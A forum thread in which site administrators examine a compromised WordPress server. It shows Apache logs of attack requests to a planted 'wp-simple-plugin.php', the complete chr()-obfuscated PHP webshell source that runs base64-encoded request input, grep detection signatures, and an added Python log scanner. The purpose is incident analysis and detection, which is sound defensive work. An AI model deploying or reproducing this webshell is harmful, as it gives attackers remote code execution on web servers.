access.log.5.gz:162.158.91.230 - - [30/Dec/2019:19:20:05 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.193 - - [30/Dec/2019:19:20:36 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.90.171 - - [30/Dec/2019:19:20:37 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.230 - - [30/Dec/2019:19:21:07 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.105 - - [30/Dec/2019:19:21:37 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.230 - - [30/Dec/2019:19:22:07 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.235 - - [30/Dec/2019:19:22:37 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.184 - - [30/Dec/2019:19:23:07 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.90.171 - - [30/Dec/2019:19:23:12 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:141.101.104.116 - - [30/Dec/2019:19:23:15 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.89.190 - - [30/Dec/2019:19:23:45 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.56 - - [30/Dec/2019:19:24:15 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.94.77 - - [30/Dec/2019:19:24:45 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.56 - - [30/Dec/2019:19:25:15 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.124 - - [30/Dec/2019:19:25:45 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.89.190 - - [30/Dec/2019:19:25:46 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.105 - - [30/Dec/2019:19:44:24 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.94.53 - - [30/Dec/2019:19:44:55 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.184 - - [30/Dec/2019:19:45:55 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:172.69.55.61 - - [30/Dec/2019:19:45:25 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.235 - - [30/Dec/2019:20:33:40 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.88.95 - - [30/Dec/2019:19:44:25 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:141.101.77.155 - - [30/Dec/2019:20:33:40 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.235 - - [30/Dec/2019:20:34:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.109 - - [30/Dec/2019:20:35:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.109 - - [30/Dec/2019:20:34:40 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.90.21 - - [01/Jan/2020:08:08:20 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.105 - - [01/Jan/2020:08:08:21 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.88.197 - - [01/Jan/2020:08:10:01 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.184 - - [01/Jan/2020:08:11:41 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.90.171 - - [01/Jan/2020:08:13:22 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.69.55.25 - - [22/Dec/2019:16:02:21 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:162.158.111.184 - - [22/Dec/2019:16:02:21 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 1672 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.69.54.180 - - [22/Dec/2019:16:02:24 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 701 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.69.54.204 - - [22/Dec/2019:16:02:27 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 5272 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.244.231 - - [24/Dec/2019:06:19:55 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.193 - - [24/Dec/2019:06:19:55 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 5638 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.169 - - [24/Dec/2019:06:21:52 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.244.243 - - [24/Dec/2019:06:21:53 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 5638 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.11.74 - - [24/Dec/2019:06:33:43 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.193 - - [24/Dec/2019:06:33:52 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 5638 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.244.57 - - [26/Dec/2019:23:48:53 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.245.208 - - [26/Dec/2019:23:48:54 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 464 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.245.184 - - [28/Dec/2019:17:24:34 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.193 - - [28/Dec/2019:17:24:38 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 40955 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.11.74 - - [28/Dec/2019:17:40:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.193 - - [28/Dec/2019:17:40:12 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 40955 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.244.231 - - [28/Dec/2019:19:07:04 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.244.93 - - [28/Dec/2019:19:08:04 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.193 - - [28/Dec/2019:19:07:34 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.6.gz:172.68.10.169 - - [28/Dec/2019:19:07:04 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.7.gz:141.101.77.113 - - [20/Dec/2019:13:47:49 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.7.gz:141.101.76.19 - - [20/Dec/2019:13:47:50 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 519 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:58 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 369 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:141.101.104.116 - - [11/Dec/2019:10:21:28 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.55.37 - admin [11/Dec/2019:10:21:29 -0500] "PUT /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 200 291 "-" "Go-http-client/1.1"

access.log.8.gz:141.101.104.212 - - [11/Dec/2019:10:21:30 -0500] "GET /wp-content/uploads/2019/12/wp-simple-plugin.php?d1=dmFyX2R1bXAoIi0tbGQtLSIpOw==&q=dmFyX2R1bXAoIi0tbGQtLSIpOw==&d=dmFyX2R1bXAoIi0tbGQtLSIpOw== HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:08:22 (70.9 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:10:02 (70.2 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:11:42 (68.0 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:13:22 (39.5 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:29:09 (46.6 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:29:38 (136 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:31:32 (172 MB/s) - `wp-simple-plugin.php' saved [1087/1087]

error.log.5.gz:Saving to: `wp-simple-plugin.php'

error.log.5.gz:2020-01-01 08:33:02 (149 MB/s) - `wp-simple-plugin.php' saved [1087/1087]



So apparently this d1= shit is popular, lol:

Code:
access.log.13.gz:141.101.104.116 - - [07/Nov/2019:15:57:25 -0500] "GET /wp-content/plugins/super-socialat/super_socialat.php?d1=ZGllKG1kNSgzNDM0KSk7 HTTP/1.1" 404 4632 "CUSTOMERCOMPANY.com" "Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37"
access.log.45.gz:172.68.143.117 - - [30/Mar/2019:21:05:20 -0400] "GET /wp-craft-report.php?d1=ZGllKG1kNSgzNDUzNCkpOw== HTTP/1.1" 404 4630 "http://www.google.com" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36"
access.log.46.gz:108.162.229.7 - - [20/Mar/2019:23:06:52 -0400] "GET /wp-craft-report.php?d1=ZGllKG1kNSgzNDUzNCkpOw== HTTP/1.1" 404 4630 "http://www.google.com" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36"
access.log.46.gz:162.158.59.109 - - [21/Mar/2019:18:40:56 -0400] "GET /wp-content/plugins/super-socialat/super_socialat.php?d1=ZGllKG1kNSgzNDUzNCkpOw== HTTP/1.1" 404 4630 "http://www.google.com" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36"
access.log.49.gz:108.162.226.8 - - [25/Feb/2019:08:33:41 -0500] "GET / HTTP/1.1" 200 6104 "http://ManlyCUSTOMER.com/.well-known/wp-craft-report.php?d1=ZWNobyAiZmdkZmczNDU2MyI7" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.49.gz:103.22.200.231 - - [25/Feb/2019:08:33:42 -0500] "GET / HTTP/1.1" 200 6096 "http://ManlyCUSTOMER.com/.well-known/wp-craft-report.php?d1=ZWNobyAiZmdkZmczNDU2MyI7" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.49.gz:103.22.200.135 - - [25/Feb/2019:08:33:43 -0500] "GET / HTTP/1.1" 200 6097 "http://ManlyCUSTOMER.com/.well-known/wp-craft-report.php.suspected?d1=ZWNobyAiZmdkZmczNDU2MyI7" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.49.gz:103.22.200.231 - - [25/Feb/2019:08:33:46 -0500] "GET / HTTP/1.1" 200 6099 "http://ManlyCUSTOMER.com/.well-known/wp-build-report.php?d1=ZWNobyAiZmdkZmczNDU2MyI7" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.49.gz:108.162.226.38 - - [25/Feb/2019:08:33:47 -0500] "GET / HTTP/1.1" 200 6101 "http://ManlyCUSTOMER.com/.well-known/wp-build-report.php.suspected?d1=ZWNobyAiZmdkZmczNDU2MyI7" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.49.gz:162.158.114.115 - - [25/Feb/2019:22:12:20 -0500] "GET /.well-known/wp-craft-report.php?d1=ZWNobyAiZmdkZmczNDU2MyI7 HTTP/1.1" 404 4630 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.49.gz:162.158.114.97 - - [25/Feb/2019:22:12:24 -0500] "GET /.well-known/wp-craft-report.php?d1=ZWNobyAiZmdkZmczNDU2MyI7 HTTP/1.1" 404 4630 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
access.log.8.gz:141.101.104.212 - - [11/Dec/2019:10:21:30 -0500] "GET /wp-content/uploads/2019/12/wp-simple-plugin.php?d1=dmFyX2R1bXAoIi0tbGQtLSIpOw==&q=dmFyX2R1bXAoIi0tbGQtLSIpOw==&d=dmFyX2R1bXAoIi0tbGQtLSIpOw== HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"



After gazing into these shitty scripts, I realize a similarity many of these h0m0 things share: they use GET and .php? somewhere. Skkkiiididdddzzzzssssoooooosss.



Fine, h03:

Code:
/var/log/apache2# zgrep -a "GET /" *gz | grep ".php?"



Imma zgrep y00.



Okay, this is just too fun - now I am targeting stuff..

Code:
cd /var/log/apache2

# or, on httpd-based distros:
cd /var/log/httpd



... umm I am just posting the logs elsewhere they're long lol. Pastebin I guess..

Okay, so I archived this crap over to here:

This is nicer:

kinda look like le poop poop - but works for all purposes.

Just copy/pasta this to a text editor if you want to inspect closely.
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
Sharing source code to this malicious PoS:
Code:
<?php if(isset($_POST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_POST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).chr(97).chr(51).chr(102).chr(50).chr(100).chr(99)) { $a = chr(109).chr(110);     $n1 = chr(102).chr(105).chr(108).chr(101).chr(95);$n2 = chr(112).chr(117).chr(116).chr(95);$n3 = $n1.$n2.chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1;     $z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);     $z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]);     $z3 = $b2($_REQUEST[chr(100).chr(49)]);     @$n3($a,$z2);     @include($a);@unlink($a);     $a = chr(47).chr(116).chr(109).chr(112).chr(47).$a;     @$n3($a,$z2);     @include($a);@unlink($a);die();  } else { $cbb = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); echo $cbb(chr(78).chr(68).chr(65).chr(48).chr(76).chr(83).chr(49).chr(108).chr(99).chr(110).chr(74).chr(118).chr(99).chr(103).chr(61).chr(61)); }

Want to detect this thing?
I just found a VERY simple signature these files share in common with a low false-positive rate.. the way they positioned md5 right after a special char:
Code:
cd /var/www
grep -rnw './' -e "& md5"

This should show every infected file.

DETECTION:
Code:
cd /tmp/
grep -rnw '/tmp' -e "file_get_contents"
grep -rnw '/var/www' -e "& md5"

If you see any of the above, these are characteristics of the infectious files. They appear to have gained access via an outdated Adminer CVE:

Basically.. someone logs into your stuff using adminer root/localhost/defaults everything. Then they get you.. seems REAL easy..?
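An added example, not code from the thread or its author: a Python helper that automates the two manual checks in this thread, the zgrep hunt for GET requests carrying base64-encoded PHP in a query string (the d1=ZWNobyAi... pattern) and the "& md5" grep for the dropped file. The sample log lines, the PHP_HINTS word list and the chr()-run threshold are constructed assumptions to tune locally.

```python
"""Added detection helper, not the thread's own code. It automates two checks the
thread does by hand: base64-encoded PHP in request query strings (the d1=ZWNobyAi...
pattern) and the '& md5' plus chr()-run signature of the dropped webshell."""
import base64
import re
from urllib.parse import unquote, urlsplit

# Constructed log lines in the zgrep "file:line" form used in the thread; the last is benign.
SAMPLE_LOG = [
    'access.log.49.gz:162.158.114.115 - - [25/Feb/2019:22:12:20 -0500] "GET /.well-known/wp-craft-report.php?d1=ZWNobyAiZmdkZmczNDU2MyI7 HTTP/1.1" 404 4630 "-" "Mozilla/5.0"',
    'access.log.8.gz:141.101.104.212 - - [11/Dec/2019:10:21:30 -0500] "GET /wp-simple-plugin.php?d1=dmFyX2R1bXAoIi0tbGQtLSIpOw==&q=x HTTP/1.1" 206 334 "-" "Mozilla/5.0"',
    'access.log.8.gz:10.0.0.5 - - [11/Dec/2019:10:22:00 -0500] "GET /wp-login.php?redirect_to=aHR0cHM6Ly9leGFtcGxlLmNvbS8= HTTP/1.1" 200 1 "-" "Mozilla/5.0"',
]
LOG_RE = re.compile(r'^(?:[^\s:]+:)?(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" \d{3} \S+ '
                    r'"(?P<referer>[^"]*)" "[^"]*"')
# PHP constructs seen in the decoded payloads on the thread; tune to local false positives.
PHP_HINTS = re.compile(r"\b(echo|var_dump|eval|system|base64_decode|file_put_contents)\b")
CHR_RUN = re.compile(r"(?:chr\(\d+\)\.){5,}")  # five or more chained chr() calls (assumed threshold)

def decode_b64_php(value):
    """Decoded text if value is strict base64 for printable, PHP-looking text; else None."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() and PHP_HINTS.search(text) else None

def scan_log(lines):
    """Return (ip, path, param, decoded) for base64 PHP in the target or the Referer."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("target", "referer"):
            url = urlsplit(m.group(field))
            for pair in url.query.split("&"):
                key, _, value = pair.partition("=")
                payload = decode_b64_php(unquote(value))  # unquote (not unquote_plus) keeps '+'
                if payload:
                    hits.append((m.group("ip"), url.path, key, payload))
    return hits

def looks_like_chr_webshell(php_source):
    """The thread's '& md5' grep combined with a chr() concatenation run."""
    return "& md5(" in php_source and bool(CHR_RUN.search(php_source))

if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```

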